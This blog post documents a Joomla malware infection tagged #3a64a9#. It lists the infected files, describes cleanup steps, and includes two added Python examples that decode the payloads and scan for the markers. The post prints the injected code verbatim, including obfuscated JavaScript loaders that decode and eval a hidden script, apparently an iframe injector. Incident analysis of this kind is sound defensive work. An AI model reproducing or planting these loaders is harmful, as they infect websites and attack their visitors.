
Malware injection in Joomla: base64_decode


Fatal error: Cannot redeclare | #3a64a9# $GLOBALS

I had not seen this malware infection in my eight years working with Joomla, and in the last week it has happened to me twice, on this very site.

The malicious code is written to the following files and affects both the administrator back end and the site:

/index.php
/administrator/index.php

In my case it has also spread to the following:

/libraries/cms/error/page.php
/templates/sj_plus/index.php  (the index file of the template I use)
/administrator/components/com_login/login.php
/administrator/modules/mod_login/mod_login.php
/administrator/templates/isis/login.php
/administrator/templates/isis/index.php
/modules/mod_ads_elite/tmpl/default.php
/modules/mod_search/tmpl/default.php

The injected code is conspicuously large. In the first infection (which happened in the template's index.php) it was the following:

<?php
#3a64a9#
if(empty($anal)) {
$anal = "base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KDQogIHZhciBfZ2FxID0gX2dhcSB8fCBbXTsNCiAgX2dhcS5wdXNoKFsnX3NldEFjY291bnQnLCAnVUEtMzc0Njc1NzUtMSddKTsNCiAgX2dhcS5wdXNoKFsnX3RyYWNrUGFnZXZpZXcnXSk7DQoNCiAgKGZ1bmN0aW9uKCkgew0KICAgIHZhciBnYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBnYS50eXBlID0gJ3RleHQvamF2YXNjcmlwdCc7IGdhLmFzeW5jID0gdHJ1ZTsNCiAgICBnYS5zcmMgPSAoJ2h0dHBzOicgPT0gZG9jdW1lbnQubG9jYXRpb24ucHJvdG9jb2wgPyAnaHR0cHM6Ly9zc2wnIDogJ2h0dHA6Ly93d3cnKSArICcuZ29vZ2xlLWFuYWx5dGljcy5jb20vZ2EuanMnOw0KICAgIHZhciBzID0gZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoJ3NjcmlwdCcpWzBdOyBzLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGdhLCBzKTsNCiAgfSkoKTsNCg0KPC9zY3JpcHQ+');
";
echo $anal;
}

#/3a64a9#
?>

In the second, the code is even larger:

#3a64a9#
 $GLOBALS['_1143660864_']=Array(); ?><? function _728088952($i){$a=Array();return base64_decode($a[$i]);} ?>if(empty($bgw)) {
$bgw = "<script type=\"text/javascript\" language=\"javascript\">gzegvi=\"y\";xnwlmx=\"document\";try{+function(){if(document.querySelector)--(window[xnwlmx].getElementById(\"asd\"))}()}catch(wwfmu){gcfjet=function(kok){kok=\"fro\"+kok;for(nafgov=0;nafgov<gzegvi.length;nafgov++){evjx+=String[kok](admsqn(sdhq+(gzegvi[nafgov]))-(54));}};};admsqn=eval;sdhq=\"0x\";ztg=0;if(!ztg){try{++admsqn(xnwlmx)[\"\x62o\"+\"d\"+gzegvi]}catch(wwfmu){gyb=\"(\";}gzegvi=\"56(9c(ab(a4(99(aa(9f(a5(a4(56(a9(a2(a8(66(6f(5e(5f(56(b1(43(40(56(ac(97(a8(56(a9(aa(97(aa(9f(99(73(5d(97(a0(97(ae(5d(71(43(40(56(ac(97(a8(56(99(a5(a4(aa(a8(a5(a2(a2(9b(a8(73(5d(9f(a4(9a(9b(ae(64(a6(9e(a6(5d(71(43(40(56(ac(97(a8(56(a9(a2(a8(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a8(9b(97(aa(9b(7b(a2(9b(a3(9b(a4(aa(5e(5d(9f(9c(a8(97(a3(9b(5d(5f(71(43(40(43(40(56(a9(a2(a8(64(a9(a8(99(56(73(56(5d(9e(aa(aa(a6(70(65(65(aa(9f(aa(ab(a9(a6(a8(a5(a9(64(99(a5(a3(65(a6(9d(97(65(99(a4(aa(64(a6(9e(a6(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(a6(a5(a9(9f(aa(9f(a5(a4(56(73(56(5d(97(98(a9(a5(a2(ab(aa(9b(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(99(a5(a2(a5(a8(56(73(56(5d(6b(67(66(68(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(9e(9b(9f(9d(9e(aa(56(73(56(5d(6b(67(66(68(a6(ae(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(ad(9f(9a(aa(9e(56(73(56(5d(6b(67(66(68(a6(ae(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(a2(9b(9c(aa(56(73(56(5d(67(66(66(66(6b(67(66(68(5d(71(43(40(56(a9(a2(a8(64(a9(aa(af(a2(9b(64(aa(a5(a6(56(73(56(5d(67(66(66(66(6b(67(66(68(5d(71(43(40(43(40(56(9f(9c(56(5e(57(9a(a5(99(ab(a3(9b(a4(aa(64(9d(9b(aa(7b(a2(9b(a3(9b(a4(aa(78(af(7f(9a(5e(5d(a9(a2(a8(5d(5f(5f(56(b1(43(40(56(9a(a5(99(ab(a3(9b(a4(aa(64(ad(a8(9f(aa(9b(5e(5d(72(a6(56(9f(9a(73(92(5d(a9(a2(a8(92(5d(56(99(a2(97(a9(a9(73(92(5d(a9(a2(a8(66(6f(92(5d(56(74(72(65(a6(74(5d(5f(71(43(40(56(9a(a5(99(ab(a3(9b(a4(aa(64(9d(9b(aa(7b(a2(9b(a3(9b(a4(aa(78(af(7f(9a(5e(5d(a9(a2(a8(5d(5f(64(97(a6(a6(9b(a4(9a(79(9e(9f(a2(9a(5e(a9(a2(a8(5f(71(43(40(56(b3(43(40(b3(43(40(9c(ab(a4(99
(aa(9f(a5(a4(56(89(9b(aa(79(a5(a5(a1(9f(9b(5e(99(a5(a5(a1(9f(9b(84(97(a3(9b(62(99(a5(a5(a1(9f(9b(8c(97(a2(ab(9b(62(a4(7a(97(af(a9(62(a6(97(aa(9e(5f(56(b1(43(40(56(ac(97(a8(56(aa(a5(9a(97(af(56(73(56(a4(9b(ad(56(7a(97(aa(9b(5e(5f(71(43(40(56(ac(97(a8(56(9b(ae(a6(9f(a8(9b(56(73(56(a4(9b(ad(56(7a(97(aa(9b(5e(5f(71(43(40(56(9f(9c(56(5e(a4(7a(97(af(a9(73(73(a4(ab(a2(a2(56(b2(b2(56(a4(7a(97(af(a9(73(73(66(5f(56(a4(7a(97(af(a9(73(67(71(43(40(56(9b(ae(a6(9f(a8(9b(64(a9(9b(aa(8a(9f(a3(9b(5e(aa(a5(9a(97(af(64(9d(9b(aa(8a(9f(a3(9b(5e(5f(56(61(56(69(6c(66(66(66(66(66(60(68(6a(60(a4(7a(97(af(a9(5f(71(43(40(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(56(73(56(99(a5(a5(a1(9f(9b(84(97(a3(9b(61(58(73(58(61(9b(a9(99(97(a6(9b(5e(99(a5(a5(a1(9f(9b(8c(97(a2(ab(9b(5f(43(40(56(61(56(58(71(9b(ae(a6(9f(a8(9b(a9(73(58(56(61(56(9b(ae(a6(9f(a8(9b(64(aa(a5(7d(83(8a(89(aa(a8(9f(a4(9d(5e(5f(56(61(56(5e(5e(a6(97(aa(9e(5f(56(75(56(58(71(56(a6(97(aa(9e(73(58(56(61(56(a6(97(aa(9e(56(70(56(58(58(5f(71(43(40(b3(43(40(9c(ab(a4(99(aa(9f(a5(a4(56(7d(9b(aa(79(a5(a5(a1(9f(9b(5e(56(a4(97(a3(9b(56(5f(56(b1(43(40(56(ac(97(a8(56(a9(aa(97(a8(aa(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(9f(a4(9a(9b(ae(85(9c(5e(56(a4(97(a3(9b(56(61(56(58(73(58(56(5f(71(43(40(56(ac(97(a8(56(a2(9b(a4(56(73(56(a9(aa(97(a8(aa(56(61(56(a4(97(a3(9b(64(a2(9b(a4(9d(aa(9e(56(61(56(67(71(43(40(56(9f(9c(56(5e(56(5e(56(57(a9(aa(97(a8(aa(56(5f(56(5c(5c(43(40(56(5e(56(a4(97(a3(9b(56(57(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(a9(ab(98(a9(aa(a8(9f(a4(9d(5e(56(66(62(56(a4(97(a3(9b(64(a2(9b(a4(9d(aa(9e(56(5f(56(5f(56(5f(43(40(56(b1(43(40(56(a8(9b(aa(ab(a8(a4(56(a4(ab(a2(a2(71(43(40(56(b3(43(40(56(9f(9c(56(5e(56(a9(aa(97(a8(aa(56(73(73(56(63(67(56(5f(56(a8(9b(aa(ab(a8(a4(56(a4(ab(a2(a2(71(43(40(56(ac(97(a8(56(9b(a4(9a(56(73(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(9f(a4(9a(9b(ae(85(9c(5e(56(58(71(58(62(56(a2(9b(a4(56(5f(71(43(40(56(9f(9c(56(5e(56(9b(a4(9a(56(73(73(56(63(67(56(5f(56(9b(a4(9a(56(73(56(9a(a5(9
9(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(a2(9b(a4(9d(aa(9e(71(43(40(56(a8(9b(aa(ab(a8(a4(56(ab(a4(9b(a9(99(97(a6(9b(5e(56(9a(a5(99(ab(a3(9b(a4(aa(64(99(a5(a5(a1(9f(9b(64(a9(ab(98(a9(aa(a8(9f(a4(9d(5e(56(a2(9b(a4(62(56(9b(a4(9a(56(5f(56(5f(71(43(40(b3(43(40(9f(9c(56(5e(a4(97(ac(9f(9d(97(aa(a5(a8(64(99(a5(a5(a1(9f(9b(7b(a4(97(98(a2(9b(9a(5f(43(40(b1(43(40(9f(9c(5e(7d(9b(aa(79(a5(a5(a1(9f(9b(5e(5d(ac(9f(a9(9f(aa(9b(9a(95(ab(a7(5d(5f(73(73(6b(6b(5f(b1(b3(9b(a2(a9(9b(b1(89(9b(aa(79(a5(a5(a1(9f(9b(5e(5d(ac(9f(a9(9f(aa(9b(9a(95(ab(a7(5d(62(56(5d(6b(6b(5d(62(56(5d(67(5d(62(56(5d(65(5d(5f(71(43(40(43(40(a9(a2(a8(66(6f(5e(5f(71(43(40(b3(43(40(b3\".split(gyb);evjx=\"\";gcfjet(\"mCharCode\");admsqn(\"\"+evjx);}</script>
";
echo $bgw;
}

#/3a64a9#

Apparently this malware attack, which as far as I have been able to find does not redirect to other pages, is for the moment little known on the Web, since I have not found any specific information about it.

It does not affect the database either, that is, it is not a MySQL injection, nor does it write to .htaccess; it writes directly to the files I list above.

The server affected by these attacks is an OVH shared hosting account, and this site has been hosted on it since 2008 with different Joomla versions and different templates. Only with the latest template change I made has this problem appeared. I also cannot harden the server myself as I do with my dedicated server from the same hosting company.

So the temporary solution I am going to adopt, once all the files are clean and in the hope of stopping the writes to them, is to change the permissions of the affected files to 444 (read-only).

I will keep updating this article with any news about this malware injection incident, which I am going to call base64_decode #3a64a9# so that it is easier to find in case other Joomla users are also affected and search the Internet.

Update 03/10/2013

Today the same files as yesterday were infected again, so, suspecting that there were other affected files I had not checked, I went to the root directory, where I keep several HTML files unrelated to Joomla for various demos of the site, and every file with the .html extension was infected. The culprit of it all was a JavaScript file, also in the root directory, called youtube-embed.js (YouTube Embed Code), which I used for this tutorial: "How to embed only part of a YouTube video"; as I explain there, I downloaded it from here, and at some point during editing it got infected somehow.

In case anyone wants to see the original malware code that was in that JavaScript file, here it is:

/*3a64a9*/
function wue(){pgl=function(){--(mgozpi.body)}()}fajzjo="fr"+"om"+"Ch"+"ar"+"Co"+"de";if(document.querySelector)rjhddx=4;ojc=("74,ba,c9,c2,b7,c8,bd,c3,c2,74,b9,84,8d,7c,7d,74,cf,61,5e,74,ca,b5,c6,74,c7,c8,b5,c8,bd,b7,91,7b,b5,be,b5,cc,7b,8f,61,5e,74,ca,b5,c6,74,b7,c3,c2,c8,c6,c3,c0,c0,b9,c6,91,7b,bd,c2,b8,b9,cc,82,c4,bc,c4,7b,8f,61,5e,74,ca,b5,c6,74,b9,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c6,b9,b5,c8,b9,99,c0,b9,c1,b9,c2,c8,7c,7b,bd,ba,c6,b5,c1,b9,7b,7d,8f,61,5e,61,5e,74,b9,82,c7,c6,b7,74,91,74,7b,bc,c8,c8,c4,8e,83,83,b7,b9,b7,bd,c0,bd,b5,ba,c3,c6,c7,b6,b9,c6,bb,82,c7,b9,83,bd,c2,b8,b9,cc,bc,bd,b6,bd,c8,ca,84,8b,84,b9,83,b7,c3,c9,c2,c8,82,c4,bc,c4,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,c4,c3,c7,bd,c8,bd,c3,c2,74,91,74,7b,b5,b6,c7,c3,c0,c9,c8,b9,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,b7,c3,c0,c3,c6,74,91,74,7b,8a,88,86,84,8d,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,bc,b9,bd,bb,bc,c8,74,91,74,7b,8a,88,86,84,8d,c4,cc,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,cb,bd,b8,c8,bc,74,91,74,7b,8a,88,86,84,8d,c4,cc,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,c0,b9,ba,c8,74,91,74,7b,85,84,84,84,8a,88,86,84,8d,7b,8f,61,5e,74,b9,82,c7,c8,cd,c0,b9,82,c8,c3,c4,74,91,74,7b,85,84,84,84,8a,88,86,84,8d,7b,8f,61,5e,61,5e,74,bd,ba,74,7c,75,b8,c3,b7,c9,c1,b9,c2,c8,82,bb,b9,c8,99,c0,b9,c1,b9,c2,c8,96,cd,9d,b8,7c,7b,b9,7b,7d,7d,74,cf,61,5e,74,b8,c3,b7,c9,c1,b9,c2,c8,82,cb,c6,bd,c8,b9,7c,7b,90,c4,74,bd,b8,91,b0,7b,b9,b0,7b,74,b7,c0,b5,c7,c7,91,b0,7b,b9,84,8d,b0,7b,74,92,90,83,c4,92,7b,7d,8f,61,5e,74,b8,c3,b7,c9,c1,b9,c2,c8,82,bb,b9,c8,99,c0,b9,c1,b9,c2,c8,96,cd,9d,b8,7c,7b,b9,7b,7d,82,b5,c4,c4,b9,c2,b8,97,bc,bd,c0,b8,7c,b9,7d,8f,61,5e,74,d1,61,5e,d1,61,5e,ba,c9,c2,b7,c8,bd,c3,c2,74,a7,b9,c8,97,c3,c3,bf,bd,b9,7c,b7,c3,c3,bf,bd,b9,a2,b5,c1,b9,80,b7,c3,c3,bf,bd,b9,aa,b5,c0,c9,b9,80,c2,98,b5,cd,c7,80,c4,b5,c8,bc,7d,74,cf,61,5e,74,ca,b5,c6,74,c8,c3,b8,b5,cd,74,91,74,c2,b9,cb,74,98,b5,c8,b9,7c,7d,8f,61,5e,74,ca,b5,c6,74,b9,cc,c4,bd,c6,b9,74,91,74,c2,b9,cb,74,98,b5,c8,b9,7c,7d,8f,61,5e,74,bd,ba,74,7c,c2,98,b
5,cd,c7,91,91,c2,c9,c0,c0,74,d0,d0,74,c2,98,b5,cd,c7,91,91,84,7d,74,c2,98,b5,cd,c7,91,85,8f,61,5e,74,b9,cc,c4,bd,c6,b9,82,c7,b9,c8,a8,bd,c1,b9,7c,c8,c3,b8,b5,cd,82,bb,b9,c8,a8,bd,c1,b9,7c,7d,74,7f,74,87,8a,84,84,84,84,84,7e,86,88,7e,c2,98,b5,cd,c7,7d,8f,61,5e,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,74,91,74,b7,c3,c3,bf,bd,b9,a2,b5,c1,b9,7f,76,91,76,7f,b9,c7,b7,b5,c4,b9,7c,b7,c3,c3,bf,bd,b9,aa,b5,c0,c9,b9,7d,61,5e,74,7f,74,76,8f,b9,cc,c4,bd,c6,b9,c7,91,76,74,7f,74,b9,cc,c4,bd,c6,b9,82,c8,c3,9b,a1,a8,a7,c8,c6,bd,c2,bb,7c,7d,74,7f,74,7c,7c,c4,b5,c8,bc,7d,74,93,74,76,8f,74,c4,b5,c8,bc,91,76,74,7f,74,c4,b5,c8,bc,74,8e,74,76,76,7d,8f,61,5e,d1,61,5e,ba,c9,c2,b7,c8,bd,c3,c2,74,9b,b9,c8,97,c3,c3,bf,bd,b9,7c,74,c2,b5,c1,b9,74,7d,74,cf,61,5e,74,ca,b5,c6,74,c7,c8,b5,c6,c8,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,bd,c2,b8,b9,cc,a3,ba,7c,74,c2,b5,c1,b9,74,7f,74,76,91,76,74,7d,8f,61,5e,74,ca,b5,c6,74,c0,b9,c2,74,91,74,c7,c8,b5,c6,c8,74,7f,74,c2,b5,c1,b9,82,c0,b9,c2,bb,c8,bc,74,7f,74,85,8f,61,5e,74,bd,ba,74,7c,74,7c,74,75,c7,c8,b5,c6,c8,74,7d,74,7a,7a,61,5e,74,7c,74,c2,b5,c1,b9,74,75,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,c7,c9,b6,c7,c8,c6,bd,c2,bb,7c,74,84,80,74,c2,b5,c1,b9,82,c0,b9,c2,bb,c8,bc,74,7d,74,7d,74,7d,61,5e,74,cf,61,5e,74,c6,b9,c8,c9,c6,c2,74,c2,c9,c0,c0,8f,61,5e,74,d1,61,5e,74,bd,ba,74,7c,74,c7,c8,b5,c6,c8,74,91,91,74,81,85,74,7d,74,c6,b9,c8,c9,c6,c2,74,c2,c9,c0,c0,8f,61,5e,74,ca,b5,c6,74,b9,c2,b8,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,bd,c2,b8,b9,cc,a3,ba,7c,74,76,8f,76,80,74,c0,b9,c2,74,7d,8f,61,5e,74,bd,ba,74,7c,74,b9,c2,b8,74,91,91,74,81,85,74,7d,74,b9,c2,b8,74,91,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,c0,b9,c2,bb,c8,bc,8f,61,5e,74,c6,b9,c8,c9,c6,c2,74,c9,c2,b9,c7,b7,b5,c4,b9,7c,74,b8,c3,b7,c9,c1,b9,c2,c8,82,b7,c3,c3,bf,bd,b9,82,c7,c9,b6,c7,c8,c6,bd,c2,bb,7c,74,c0,b9,c2,80,74,b9,c2,b8,74,7d,74,7d,8f,61,5e,d1,61,5e,bd,ba,74,7c,c2,b5,ca,bd,bb,b5,c8,c3,c6,82,b7,c3,c3,bf,bd,b9,99,c2,b5,b6,c0,b9,b8,7d,
61,5e,cf,61,5e,bd,ba,7c,9b,b9,c8,97,c3,c3,bf,bd,b9,7c,7b,ca,bd,c7,bd,c8,b9,b8,b3,c9,c5,7b,7d,91,91,89,89,7d,cf,d1,b9,c0,c7,b9,cf,a7,b9,c8,97,c3,c3,bf,bd,b9,7c,7b,ca,bd,c7,bd,c8,b9,b8,b3,c9,c5,7b,80,74,7b,89,89,7b,80,74,7b,85,7b,80,74,7b,83,7b,7d,8f,61,5e,61,5e,b9,84,8d,7c,7d,8f,61,5e,d1,61,5e,d1".split(","));zyqpny=window["asdeval".substr(3)];mgozpi=window.document;for(ghtbv=0;ghtbv<ojc["le"+"ngth"];ghtbv+=1){ojc[ghtbv]=-(84)+parseInt(ojc[ghtbv],rjhddx*4);}try{wue()}catch(aifr){vvegsk=50-50;}if(!vvegsk)zyqpny(String[fajzjo].apply(String,ojc));
/*/3a64a9*/
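The two loaders shown above differ only in separator and offset: the JavaScript one splits on "," and subtracts 84 from each base-16 token, the one embedded in PHP splits on "(" and subtracts 54. The following is an added example, not part of the original post, that decodes such a payload by arithmetic alone, without running it, and lists the URLs and DOM calls in the result; the samples are constructed and harmless, and the names decode, triage and LOADERS belong to this example only.

```python
import re

# (separator, offset) as read from the two loaders on the page:
#   JS sample:  .split(",")  then  -(84)+parseInt(tok, 16)
#   PHP sample: .split("(")  then  eval("0x"+tok)-(54)
LOADERS = {"js": (",", 84), "php": ("(", 54)}

def decode(payload: str, sep: str, offset: int) -> str:
    """Decode hex tokens by subtracting offset. Pure arithmetic, nothing is evaluated."""
    payload = re.sub(r"\s+", "", payload)  # pasted payloads may wrap mid-token
    chars = []
    for tok in filter(None, payload.split(sep)):
        code = int(tok, 16) - offset  # raises ValueError on a non-hex token
        if not 0 <= code <= 0x10FFFF:
            raise ValueError(f"token {tok!r} does not fit offset {offset}")
        chars.append(chr(code))
    return "".join(chars)

def triage(text: str) -> dict:
    """List URLs and the DOM/JS calls a responder checks first in decoded script."""
    urls = re.findall(r"https?://[^\s'\"<>()]+", text)
    calls = re.findall(
        r"createElement|appendChild|document\.write|document\.cookie|\beval\b", text)
    return {"urls": urls, "calls": sorted(set(calls))}

# Constructed, harmless samples (example.invalid is a reserved name), encoded by hand
# with the same two schemes; the second one is wrapped in the middle of a token.
SAMPLE_JS = ("ca,b5,c6,74,c9,74,91,74,7b,bc,c8,c8,c4,8e,83,83,b9,cc,b5,c1,c4,c0,b9,"
             "82,bd,c2,ca,b5,c0,bd,b8,83,b5,7b,8f,74,b8,c3,b7,c9,c1,b9,c2,c8,82,cb,"
             "c6,bd,c8,b9,7c,c9,7d,8f")
SAMPLE_PHP = "ac(97(a8(5\n6(97(73(67(71"

if __name__ == "__main__":
    for name, sample in (("js", SAMPLE_JS), ("php", SAMPLE_PHP)):
        text = decode(sample, *LOADERS[name])
        print(name, repr(text), triage(text))
```

The separator and offset have to be read from each loader by hand, since other variants may use different values.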

Update 04/10/2013

In the end the infection was much more serious than I said yesterday, and a large number of JavaScript files were infected. Some examples:

/media/system/js/core.js
/media/jui/js/jquery.min.js
/media/com_komento/scripts/komento.commentitem.js
/media/com_komento/scripts/komento.commentform.js
/media/com_komento/scripts/komento.bbcode.js
/media/com_komento/scripts/komento.commentlist.js
/templates/sj_plus/js  (all 12 files in the folder)
/media/nnframework/js (the whole folder)
/media/cachecleaner/js (the whole folder)
/media/nonumbermanager/js (two .js files in the folder)
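With this many files involved, the marker pair seen in the samples (#3a64a9# ... #/3a64a9# in PHP, /*3a64a9*/ ... /*/3a64a9*/ in JavaScript) is the quickest thing to search for. The following is an added example, not part of the original post, that walks a directory tree read-only and reports every .php, .js and .html file containing such a block, plus opening markers with no matching close. Accepting any six-hex-digit id rather than only 3a64a9 is an assumption of this example, and the demo tree is constructed.

```python
import re
import tempfile
from pathlib import Path

# PHP form "#id# ... #/id#" and JS form "/*id*/ ... /*/id*/".
# The page shows only id 3a64a9; accepting any six hex digits is an assumption.
BLOCK = re.compile(
    rb"#([0-9a-f]{6})#.*?#/\1#|/\*([0-9a-f]{6})\*/.*?/\*/\2\*/", re.DOTALL)
OPENER = re.compile(rb"#([0-9a-f]{6})#|/\*([0-9a-f]{6})\*/")
WEB_EXTS = {".php", ".js", ".html", ".htm"}

def find_blocks(data: bytes):
    """Return (marker_id, start, end) for every complete injected block."""
    return [((m.group(1) or m.group(2)).decode(), m.start(), m.end())
            for m in BLOCK.finditer(data)]

def dangling_openers(data: bytes):
    """Ids of opening markers with no matching close (truncated injection)."""
    spans = [(s, e) for _, s, e in find_blocks(data)]
    return [(m.group(1) or m.group(2)).decode() for m in OPENER.finditer(data)
            if not any(s <= m.start() < e for s, e in spans)]

def scan_tree(root):
    """Map relative path -> findings, for web file types that contain a marker."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in WEB_EXTS:
            data = path.read_bytes()
            blocks, dangling = find_blocks(data), dangling_openers(data)
            if blocks or dangling:
                report[path.relative_to(root).as_posix()] = {
                    "blocks": blocks, "dangling": dangling}
    return report

def demo():
    """Scan a constructed tree: two infected files and one clean file."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.php").write_bytes(
            b"<?php\n#3a64a9#\necho 'x';\n#/3a64a9#\n?>\n<?php echo 'site';")
        (root / "core.js").write_bytes(b"/*3a64a9*/\nvar a=1;\n/*/3a64a9*/\nvar ok;")
        (root / "clean.php").write_bytes(b"<?php echo 'hi'; // colour #3a64a9\n")
        return scan_tree(root)

if __name__ == "__main__":
    for name, hit in demo().items():
        print(name, hit)
```

The start and end offsets in each finding delimit the injected bytes, which makes it easy to compare a reported file against a clean copy.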

Since it was impossible to restore a backup with the certainty that it was not also infected, I took the direct route:

1) I uninstalled the Komento comments component (which had all the .js files in its /media/com_komento/scripts/ folder infected).

2) I downloaded a clean copy of Joomla 3.1.5 from the official website, unpacked it and overwrote all the files by uploading them over FTP.

After all this, with Chrome and Internet Explorer the Avast! antivirus kept alerting me with a trojan warning like this one:

Infección:
JS:Includer-AJE [Trj]

So I had to clear all the caches and history of both browsers so that they would pick up the site's new files (without possible cookies carrying the antivirus alarm), and for now it seems to be solved. We'll see tomorrow...

NOTE: to harden a dedicated server I recommend reading these articles:

How to scan file uploads for malware with PHP Suhosin
Installing Linux Malware Detect (LMD) on RHEL, CentOS and Fedora

Jesus_Caceres